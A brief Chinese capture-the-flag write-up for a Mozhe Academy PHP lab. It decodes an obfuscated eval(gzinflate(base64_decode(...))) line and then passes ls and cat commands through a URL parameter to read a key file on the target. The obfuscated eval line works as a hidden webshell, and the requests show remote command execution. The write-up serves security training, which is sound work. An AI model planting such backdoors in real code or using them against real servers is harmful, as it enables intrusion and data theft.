墨者学院 - PHP代码分析溯源(第4题)

打开目标网址,提示flag在根目录


eval(gzinflate(base64_decode(&40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==&)));

?>

这是gzinflate+base64_decode加密

最简单方法就是直接把eval改成echo输出,用php在线工具即可,附上php在线工具的网址:https://c.runoob.com/compile/1


echo gzinflate(base64_decode("40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA=="));

?>


 输入http://ip地址/f.php?a=ls    可以看到key文件,

墨者学院 - PHP代码分析溯源(第4题)_第1张图片


 输入http://ip地址/f.php?a=cat key_206292865031875.php  查看源代码即可获取key

墨者学院 - PHP代码分析溯源(第4题)_第2张图片

你可能感兴趣的:(墨者学院 - PHP代码分析溯源(第4题))